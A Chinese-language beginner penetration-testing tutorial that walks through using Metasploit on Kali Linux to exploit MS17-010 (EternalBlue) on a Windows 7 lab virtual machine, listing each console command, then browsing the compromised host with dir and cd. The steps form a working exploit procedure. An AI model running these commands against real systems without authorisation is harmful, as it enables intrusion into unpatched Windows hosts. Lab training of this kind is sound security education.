一、背景介绍

Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework，简称叫做MSF。Metasploit作为全球最受欢迎的工具，不仅仅是因为它的方便性和强大性，更重要的是它的框架。它允许使用者开发自己的漏洞脚本，从而进行测试。Metasploit(msf)究竟威力如何呢？如何利用木马控制受害者主机呢？接下来让我们一起学习！

二、资源装备

1.安装好 Win7的虚拟机一台

2.整装待发的小白一个。

3.安装好的Kali Linux虚拟机一台。

三、攻防实战

3.1 利用Metasploit（msf）渗透框架对目标主机进行攻击，如下图所示。

步骤1：启动Metasploit（msf）渗透框架，如下图所示。

命令：msfconsole

步骤2：Metasploit（msf）渗透框架启动成功，如下图所示。

步骤3：检索漏洞，如下图所示。

命令：search 漏洞编号

例子：search ms17-010

步骤4：检索到有关漏洞的利用模块如下图所示。

步骤5：选择对应的漏洞利用模块并使用，如下图所示。

命令：use 漏洞利用模块名称

例子：use exploit/windows/smb/ms17_010_eternalblue

步骤6：查看使用的漏洞模块需要设置的参数，如下图所示。。

命令：show option

步骤7：设置攻击参数，如下图所示。

命令：set rhosts 受害者主机IP

例子：set rhosts 192.168.78.160

步骤8：查看对应的参数是否设置成功，如下图所示。

命令：show options

步骤9：运行漏洞利用模块，如下图所示。

命令：run

步骤10：如下图所示，成功拿下目标主机

提示：ETERNALBLUE overwrite completed successfully!

3.2 进入后渗透阶段，利用DOS命令控制目标主机，如下图所示。

步骤1：进入Windows系统的cmd窗口，如下图所示。

步骤2：利用命令查看受害者主机的文件夹信息，如下图所示。

命令：dir

切换文件夹目录：cd 文件夹名

切换盘符：cd 盘符名